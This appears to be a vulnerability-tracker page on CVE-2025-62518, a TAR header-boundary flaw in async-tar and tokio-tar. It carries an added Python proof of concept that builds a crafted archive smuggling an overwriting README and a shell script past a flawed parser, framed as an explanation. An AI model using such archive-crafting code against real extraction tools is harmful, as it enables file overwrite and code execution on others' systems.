
Async-tar/tokio-tar boundary parsing flaw (CVE-2025-62518)

Vulnerability
Happening score 13 · 2 unique sources, 2 articles

Summary


A high-severity TAR parsing flaw in the async-tar Rust library and its forks, including tokio-tar, puts archive extraction workflows at risk of file overwriting and potentially remote code execution. The issue, tracked as CVE-2025-62518 and nicknamed TARmageddon, stems from inconsistent handling of the boundary between PAX extended headers and ustar headers: a crafted archive can use the mismatch to smuggle hidden entries that the parser then treats as part of the archive. Users of tokio-tar are advised to migrate to astral-tokio-tar 0.5.6 to remediate the bug.
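To make the boundary problem concrete, here is an added, constructed illustration in Python; it is not code from async-tar, tokio-tar, astral-tokio-tar or from any of the page's sources. It assumes the inconsistency takes the form of a disagreement between the PAX `size` record and the ustar size field of the same entry (the page itself only says the PAX/ustar boundary handling is inconsistent), and the file names, file contents and helper functions are all invented for the example. The script builds an outer archive whose `payload.tar` entry is itself a TAR archive, then walks it with two header-stride rules: one that advances to the next header by the same size it read the entry with, and one that advances by the ustar field while still reporting the PAX size. Only the second rule surfaces the inner archive's entries as top-level entries, including a second `README.txt` that overwrites the legitimate one. Python's standard `tarfile` module is used as a cross-check that the archive is well formed and that a PAX-consistent reader sees just the two outer entries.

```python
"""Constructed demonstration of a PAX/ustar size-boundary confusion in a TAR
reader. Added example, not code from async-tar, tokio-tar or astral-tokio-tar;
names, contents and the assumed mismatch (PAX 'size' record vs. ustar size
field) are all constructed for illustration."""
import io
import tarfile

BLOCK = 512

# Constructed file contents.
GOOD = b"legitimate readme\n"
EVIL = b"attacker-controlled readme\n"
SCRIPT = b"#!/bin/sh\necho smuggled\n"


def _round_up(n: int) -> int:
    return (n + BLOCK - 1) // BLOCK * BLOCK


def _pad(data: bytes) -> bytes:
    return data + b"\0" * (_round_up(len(data)) - len(data))


def _ustar_header(name: bytes, size: int, typeflag: bytes) -> bytes:
    """Minimal POSIX ustar header with a correct checksum."""
    hdr = bytearray(BLOCK)
    hdr[0:len(name)] = name
    hdr[100:108] = b"0000644\0"            # mode
    hdr[108:116] = b"0000000\0"            # uid
    hdr[116:124] = b"0000000\0"            # gid
    hdr[124:136] = b"%011o\0" % size       # size, octal
    hdr[136:148] = b"00000000000\0"        # mtime
    hdr[148:156] = b" " * 8                # checksum field is spaces while summing
    hdr[156:157] = typeflag                # b"0" regular file, b"x" PAX extended header
    hdr[257:263] = b"ustar\0"
    hdr[263:265] = b"00"
    hdr[148:156] = b"%06o\0 " % sum(hdr)
    return bytes(hdr)


def _checksum_ok(hdr: bytes) -> bool:
    stored = int(hdr[148:156].split(b"\0", 1)[0].strip() or b"0", 8)
    return stored == sum(hdr[:148]) + 8 * ord(" ") + sum(hdr[156:])


def _pax_record(key: str, value: str) -> bytes:
    """One PAX record: '<total-length> <key>=<value>\\n', the length counts itself."""
    body = f" {key}={value}\n"
    total = len(body) + 1
    while len(str(total)) + len(body) != total:
        total += 1
    return f"{total}{body}".encode()


def build_smuggling_archive() -> bytes:
    """Outer archive whose 'payload.tar' entry is itself a TAR archive. The
    entry's real size is only in the PAX record; the ustar size field says 0."""
    inner = b"".join([
        _ustar_header(b"README.txt", len(EVIL), b"0"), _pad(EVIL),
        _ustar_header(b"smuggled.sh", len(SCRIPT), b"0"), _pad(SCRIPT),
        b"\0" * (2 * BLOCK),                                # end-of-archive marker
    ])
    pax = _pax_record("size", str(len(inner)))
    return b"".join([
        _ustar_header(b"README.txt", len(GOOD), b"0"), _pad(GOOD),
        _ustar_header(b"./PaxHeaders/payload.tar", len(pax), b"x"), _pad(pax),
        _ustar_header(b"payload.tar", 0, b"0"), _pad(inner),  # ustar claims size 0
        b"\0" * (2 * BLOCK),
    ])


def list_entries(archive: bytes, advance_by_pax_size: bool):
    """Return [(name, data)] for regular-file entries.

    The reported size always honours a preceding PAX 'size' record, as any
    PAX-aware reader does. What differs is the stride to the next header:
    advance_by_pax_size=False models the assumed flaw (stride taken from the
    ustar field), so a PAX/ustar mismatch leaves the entry's own bytes in place
    to be parsed as further headers."""
    out, off, pax_size = [], 0, None
    while off + BLOCK <= len(archive):
        hdr = archive[off:off + BLOCK]
        if hdr == b"\0" * BLOCK:
            break
        if not _checksum_ok(hdr):
            raise ValueError(f"bad header checksum at offset {off}")
        name = hdr[:100].split(b"\0", 1)[0].decode()
        ustar_size = int(hdr[124:136].split(b"\0", 1)[0].strip() or b"0", 8)
        typeflag = hdr[156:157]
        off += BLOCK
        if typeflag == b"x":
            for rec in archive[off:off + ustar_size].split(b"\n"):
                if rec:
                    key, value = rec.split(b" ", 1)[1].split(b"=", 1)
                    if key == b"size":
                        pax_size = int(value)
            off += _round_up(ustar_size)
            continue
        size = pax_size if pax_size is not None else ustar_size
        out.append((name, archive[off:off + size]))
        off += _round_up(size if advance_by_pax_size else ustar_size)
        pax_size = None
    return out


def extract_to_dict(archive: bytes, advance_by_pax_size: bool) -> dict:
    """Model extraction into one directory: a later entry with the same name
    overwrites an earlier one, as it would on disk."""
    files = {}
    for name, data in list_entries(archive, advance_by_pax_size):
        files[name] = data
    return files


def stdlib_view(archive: bytes):
    """Cross-check with Python's tarfile, which derives the next-header offset
    from the PAX size: it sees exactly the two outer entries."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
        return [(m.name, m.size) for m in tf.getmembers()]


ARCHIVE = build_smuggling_archive()

if __name__ == "__main__":
    for label, consistent in (("consistent stride", True), ("ustar stride (flawed)", False)):
        print(label, [n for n, _ in list_entries(ARCHIVE, consistent)])
    print("stdlib tarfile", stdlib_view(ARCHIVE))
```

Run as a script, it prints both listings: with the flawed stride the attacker's `README.txt` becomes a top-level entry that lands after the legitimate one and replaces it, which is the file-overwrite outcome the summary describes, and `smuggled.sh` appears although no PAX-consistent reader lists it. The rule the consistent variant follows is the general one for any TAR reader: the size used to read an entry's data and the size used to locate the next header must be one and the same value. Whether the affected libraries mishandle the boundary in exactly this way is an assumption of this example.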

Related Happenings

Tokio-tar remediation guidance (CVE-2025-62518)

Advisory/Mitigation
First: 22.10.2025 20:21 · Last: 22.10.2025 20:21 · Sources: 1

How related: Edera advises developers to either upgrade to a patched version or immediately remove the vulnerable tokio-tar dependency.

About this happening: **Edera** told developers using **tokio-tar** to **upgrade to a patched version** or **immediately remove** the dependency because **CVE-2025-62518** leaves projects exposed to ar...

Timeline

  1. 22.10.2025 10:05 · 3 articles

    Researchers disclose CVE-2025-62518 in async-tar and tokio-tar

    Initial Disclosure

    A high-severity parsing flaw in the async-tar Rust library and its forks, including tokio-tar, tracked as CVE-2025-62518 and nicknamed TARmageddon, lies in how the libraries handle the boundary between PAX extended headers and ustar headers. A crafted TAR archive can exploit the inconsistency to smuggle nested archive entries, overwrite files within the extraction directory, and potentially reach remote code execution. Users relying on tokio-tar are advised to migrate to astral-tokio-tar 0.5.6.
